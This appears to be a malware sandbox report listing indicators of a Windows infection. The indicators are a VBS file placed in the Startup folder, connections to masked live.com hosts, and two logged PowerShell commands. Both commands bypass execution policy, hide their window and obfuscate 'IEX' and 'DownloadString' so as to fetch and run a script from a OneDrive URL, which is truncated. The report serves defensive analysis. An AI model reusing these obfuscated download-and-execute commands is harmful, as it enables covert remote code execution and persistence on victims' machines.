Technical information
- %APPDATA%\microsoft\windows\start menu\programs\startup\shvhost.vbs
- 'on####ve.live.com':443
- 'lo###.live.com':443
- DNS ASK on####ve.live.com
- DNS ASK lo###.live.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedriv...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedriv...